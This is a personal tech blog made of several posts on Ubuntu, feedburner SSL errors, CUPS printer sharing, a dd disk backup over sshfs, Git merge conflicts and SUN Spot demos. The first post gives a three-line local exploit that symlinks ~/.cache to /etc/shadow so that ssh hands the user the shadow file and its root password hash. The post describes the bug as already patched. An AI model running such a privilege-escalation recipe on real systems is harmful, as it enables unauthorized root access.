uuurrgh... Ubuntu

Ubuntu, you all should know, isn’t my preferred operating system. It’s very nice for linux beginners and may decrease some manual work at private machines, but when I’ve heard about the actual bug I’m very confused why we still have to use Ubuntu in our PC pools and why some work groups are emphatic about this system and why we have to administrate their server and local machines with Ubuntu.

I’m still wondering why simple users in Ubuntu systems can out of the box read all log files or the shadow.. That is not that kind of security I’m dreaming about ;)

The actual bug is very simple (via):

rm -rf ~/.cache
ln -s /etc/shadow ~/.cache
ssh localhost

Now you’ve owned the shadow file and you are able to modify roots pass phrase! It’s just too easy…

By the way I tried it by myself and got a funny message:

mscharm@SERVER ~ % ssh localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
aa:bb:cc:dd:ee:ff:gg:hh:ii:jj:kk:ll:mm:nn:oo:pp.
Please contact your system administrator.
Add correct host key in /homes/mscharm/.ssh/known_hosts to get rid of this message.
Offending key in /homes/mscharm/.ssh/known_hosts:10
RSA host key for localhost has changed and you have requested strict checking.
Host key verification failed.
255 mscharm@SERVER ~ %

And my friend Rumpel also tried this exploit and after lunch I just heard him saying

fuck, bolted out, by my self...

not able to disable his screensaver. Maybe he changed a little bit to much in his shadow file!? ;)

Fortunately the patch is released, so have a lot of fun while updating your systems. You should reboot after the update, otherwise the bug is still enabled…

Google does not like self-signed SSL certs

The last few days my feeds were out of date. I manage them with Google’s solution called feedburner, you may have recognized it.

It seems that the developer of this project changed some stuff, anyway, they did not actualize my feeds. The last days (or weeks) I did not had the time to care about, but today I found some minutes.

When I tried to resync my feeds manually I got this nice red error (see also the picture):

There is an issue that must be addressed with your source feed for the feed "binfalse" sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target

This is caused by my Apache redirect directive that redirects all visitors looking for an insecure URL at port 80 to my SSL encrypted content at port 443:

<virtualhost *:80>
...
        Redirect / /
...
</virtualhost>

So you see I’m caring about security ;)

This method works for a long time, but now feedburner tries to verify the certs and because of a lack of money I signed my certs by myself. So feedburner denies the access and doesn’t reread my own feeds to update its database. To repair this problem I’m just redirecting my real content and not the feeds, so feedburner is happy and why should I care about the secure connection of feedburner to my site..

Nevertheless it is not my preferred solution.

Inactivity? Not in the slightest...

Before anyone thinks I’m hibernating, I’ve just soo much to do, so there is no time to maintain this blog… Just don’t know what to do first.

This week I had a presentation, topic was “Modeling of Overflow Metabolism in Batch and Fed-Batch Cultures of Escherichia coli”. I also had to submit a study, with the headline “Modeling and evaluation of the dynamic behavior of a fermentation by simulation”, that among others analyzes the dependencies of the ratio of product concentration versus biomass concentration on biological parameters. Additionally this week I finished a work for a friend at the Otto-von-Guericke-Universität Magdeburg. He has to evaluate x-rays taken at a new detector and I developed a tool that does the trick.

As if that were not enough time consuming I’m still working on my project work, next week I have to present it in a research seminar (fortunately in German).

The reason I write this article, tomorrow is the so called Lange Nacht der Wissenschaften (translated by Google: Long Night of Science). Here the different departments of the university are presenting what they are doing, comprehensible for the public. In this event we have also a slot dealing with SUN Spots where I’m presenting some cool stuff I’ve programmed. Planed are a some introductions what Spots are and what they can do, and of course some demos. Among others we are playing with the light sensor and visualize a sunrise and a sunset, we demonstrate how one can regulate a fan depending on the temperature measured with a Spot (to induce a higher temperature a candle is planed, I hope everything will be well and the Spot won’t melt away!). Of course some basic demos are shown, like AirText or the BouncingDemo, and last but not least it is time to play. I have prepared a labyrinth that has to be solved by various people against each other (up to seven people at a time in the same labyrinth, just limited by the number of available Spots), and also I also developed a control system for the game Blobby Volley to navigate the Blobbies with a Spot, maybe you’ve heard about it ;) We also wanted to build a little car to drive around a little bit, but I’m not such engineer so this car isn’t finished…

If you are bored and don’t know what to do tomorrow visit this presentation!! It’s at 8.30 am in room 3.31 at the Von-Seckendorff-Platz 1.

Maybe I publish all the code when there is a little bit time to write some comments and how-to’s.

So you see, I’m very busy at the moment. If anyone has nothing to do, just notify me, I’ll give you something to work on!

Thunderbird to systray

Til version 3 of Thunderbird, or more exactly icedove, I used the add-on New Mail Icon to free the busy space in task list that the Thunderbird process uses even though I have this window very rarely in foreground. But it seems that there is no further development in this project, so this software isn’t compatible to the actual major release…

On my main desktop I thought I have to live with that, but on my notebook screen there is a lack of space, more than ever, so I had to search for an alternative tool. On my way I found a tool (no add-on) called AllTray, it’s available in the Debian/Ubuntu repository. That can dock any window to your tray, so it doesn’t depend on Thunderbird, you can also dock a terminal or your editor or even a complete (Oracle VM) VirtualBox instance.

For my Thunderbird problem it’s a half of the solution, because this tool doesn’t tell me whether there are unread mails. But after some more research I found a real add-on called FireTray that does the desired trick. So more space for other junk ;-)

Serv local printer

I have an old printer, an HP Laserjet 6P. It is very reliable and fast, so no need to buy a new one. But there is a problem (I thought), this printer has no network interface, it is connected with a parallel port to my host. Some minutes ago I racked my head how to use this printer with my notebook. Now I’m wondering how easy it is using cups!!

On the server side (the machine that is connected to the printer) you just have to modify this printer and check the field called “Share This Printer”, and in the administration tab just enable “Share printers connected to this system” and “Allow printing from the Internet”.

On your client you only have to publish your server. To do it for the complete system write the following line in your /etc/cups/client.conf , to set this server only for your local user account write it to your users $HOME/.cups/client.conf :

ServerName SERVER:PORT

You just have to specify the port if your server is not listening on the default port 631.

That’s it! Open a document and try to print! I still cannot believe that it is that easy ;)

Thanks to the cups-team

Need more bandwidth!

Today I got my new notebook, an IdeaPad. I had some concerns about the glare display, never used glare displays but it seems to be no problem and I don’t have a choice, Lenovo doesn’t sell that kind of notebooks without glare displays.

This laptop comes with Windows XP and of course I have to fix this bug ;)

But before I’ll delete the Windows installation and install a proper os the original system has to be backed up (I want to test some things before I decide whether to buy the laptop). So I installed the first release of „Ύπνος“ to my USB flash drive and booted into it. To back up the hard drive I mounted a piece of my main machine’s hard drive via sshfs to the laptop and copied the laptop’s hard drive to the other machine:

root@sidux /tmp % mkdir mount
root@sidux /tmp % sshfs user@192.168.0.55:/backup/lenovo mount/
password: 
root@sidux /tmp % dd if=/dev/sda of=/tmp/mount/neu.ddi ibs=1024k obs=8192

Ok, the notebook’s drive keeps 160 GB and I just have a 99 ct fast ethernet switch, so you can calculate the time I have to wait… That sucks, doesn’t anyone have a gigabit switch lying around? I would prefer Cisco switches ;)

Hopefully the backup will finish today, so I can play a little bit with the laptop and its luxurious 1.280x720 screen resolution on the 10’’ glare display.

Which country is the most stupid

Today I had a conversation with a scientist from Bulgaria who is working with microarrays. He told me some practical experiences of his work. It was very interesting and I learned a lot of things, in spite of the fact that I gave a lecture about microarrays some time ago.

In this talk he said a wonderful sentence:

Früher dachte ich immer die Russen wären dumm, bis ich die Amerikaner kennen gelernt habe!

English translation: Some years ago I thought the Russians are stupid, until I got to know the Americans.

Topic was the structuring of websites of companies. If he has a question he always has to search through the web because everyone tells him the answer is anywhere in there! affymetrix for example has thousands of user manuals, the intersection of all of these papers is very small, but one paper has hundreds of pages… And I think he is totally right. The arrangement of information today is very terrible, to find what you are searching about is some kind of art! But he doesn’t mince matters. I really like Eastern Europeans ;)

He invented me to his lab tomorrow so I can see how this affymetrix machinery produces the data that I get to analyze.

Little quickie through Germany

Oh no, not that kind of quickie you might think about! Rumpel an me decided more or less spontaneously to go to Bonn and visit one of our former employee Martin and additionally take a little look at SIGINT in Cologne.

So we rent a car at Sixt on Friday morning and met Martin at 5 pm in his flat. Of course our trip was very analog, we didn’t have any navigation device, just printed a route calculated by Google maps and rely to male instinct on the way through Germany and the high traffic in Ruhr Valley at Friday afternoon before holiday… What should I say, of course everything went totally well and we had a lot of fun in our little car! You can see some pictures at picasa.

Quickie through Germany
Quickie through Germany

Of course it was a great weekend! We’ve seen a lot of fascination places of Bonn and Cologne like Cologne cathedral, big ships on Rhine or Media Center in Cologne. The events at SIGINT were also interesting, where it cannot be compared with the Chaos Communcation Congress in Berlin. In Cologne you’ll always get a chair and the queues are very short. Nevertheless the topics are of high quality.

All in all it was an excellent trip, even it was very expensive.

Git merging showcase

One of the people that are working with me on some crazy stuff always forgets to pull the newest revision of the repository before changing the content and so he has very often trouble with different versions when he decides to push his work to the master repository. His actual workaround is to check out the complete repository in a new directory and merge his changes by hand into this revision… Here is a little instruction to maximize his productivity and minimize the network traffic.

Lets assume we have a repository, created like this:

/tmp % git init --bare root

And we have one user, that clones this new repository and inits:

/tmp % git clone root slave1
/tmp % cd slave1
/tmp/slave1 (git)-[master] % echo "line1\\nline2" >> testfile
/tmp/slave1 (git)-[master] % cat testfile
line1
line2
/tmp/slave1 (git)-[master] % git add .
/tmp/slave1 (git)-[master] % git commit -m "init"
[master (root-commit) bc7e4da] init
 1 files changed, 2 insertions(+), 0 deletions(-)
 create mode 100644 testfile
/tmp/slave1 (git)-[master] % git push ../root master

So we have some content in our root repo. Another user (our bad guy) clones that repository too:

/tmp % git clone root slave2

So let a bit of time elapse, while user one is changing the root repository so that the testfile may look like this:

/tmp/slave1 (git)-[master] % cat testfile | sed 's/line1/&\\nline1a/' > testfile.tmp && mv testfile.tmp testfile
/tmp/slave1 (git)-[master] % cat testfile
line1
line1a
line2

And of course, the changer commits his changes:

/tmp/slave1 (git)-[master] % git commit -a -m "haha, root has changed..."
[master e18f637] haha, root has changed...
 1 files changed, 1 insertions(+), 0 deletions(-)
/tmp/slave1 (git)-[master] % git push ../root master
Counting objects: 5, done.
Writing objects: 100% (3/3), 265 bytes, done.
Total 3 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (3/3), done.
To ../root
   bc7e4da..a04d363  master -> master

Ok, nothing bad happened, but now our special friend decides to work:

/tmp/slave2 (git)-[master] % cat testfile | sed 's/line1/&\\nline1b/' > testfile.tmp && mv testfile.tmp testfile
/tmp/slave2 (git)-[master] % cat testfile
line1
line1b
line2
/tmp/slave2 (git)-[master] % git commit -a -m "oops, i am very stupid..."
[master d691ada] oops, i am very stupid...
 1 files changed, 1 insertions(+), 0 deletions(-)

What do you think will happen if he tries to push his changes to the master repo? Your right, nothing but a error:

/tmp/slave2 (git)-[master] % git push ../root master
To ../root
 ! [rejected]        master -> master (non-fast-forward)
error: failed to push some refs to '../root'
To prevent you from losing history, non-fast-forward updates were rejected
Merge the remote changes before pushing again.  See the 'Note about
fast-forwards' section of 'git push --help' for details.

Mmmh, so lets try to pull the root repo:

/tmp/slave2 (git)-[master] % git pull ../root master
remote: Counting objects: 5, done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (3/3), done.
From ../root
 * branch            master     -> FETCH_HEAD
Auto-merging testfile
CONFLICT (content): Merge conflict in testfile
Automatic merge failed; fix conflicts and then commit the result.

Our friend would now check out the whole repository and insert his changes by hand, but whats the better solution? Merging the file! Git has a function called mergetool , you can merge the conflicts with a program of your choice. Some examples are vimdiff , xxdiff , emerge or also for GUI lovers kdiff3 . In this post I’ll use vimdiff :

/tmp/slave2 (git)-[master|merge] % git mergetool --tool=vimdiff testfile

Normal merge conflict for 'testfile':
  {local}: modified
  {remote}: modified
Hit return to start merge resolution tool (vimdiff): 
3 files to edit

So change the conflicting file(s), you will also see the changes made in root’s and in your local revision. If you’re done just save it and commit your merge:

/tmp/slave2 (git)-[master|merge] % git commit -m "merged"
[master 6be1482] merged

Great, now there is nothing that prevents you from pushing your changes to the root repository:

/tmp/slave2 (git)-[master] % git push ../root master
Counting objects: 10, done.
Delta compression using up to 2 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (6/6), 555 bytes, done.
Total 6 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (6/6), done.
To ../root
   a04d363..6be1482  master -> master

I think this way of solving such conflicts maybe much more efficient than cloning the whole repository again and again and again ;)

First SUN Spot results

One week passed since I got a package of Spots, this weekend I found some time to hack a little bit with this funny components.

First of all I programmed a tool that visualizes the Spots movement in an OpenGL frame that draws a virtual Spot. Nice for demonstrations, but nothing spectacular.

After that I developed a little mouse emulator, that translates Spot movement to mouse motions on the screen. Here the Spot isn’t doing anything intelligent, it only sends its tilt status every 25 ms as well as switch events to broadcast. Another Spot, working as basestation connected to my machine, is listening to this talking Spot and my host analyzes the received values. To move the mouse on the screen or to generate a click I use the Robot class of the Java AWT package. Long story short, a video may explain it more understandable (via YouTube):

</embed> I will continue with working on these libraries before I publish them in another post. So look forward to the release ;-)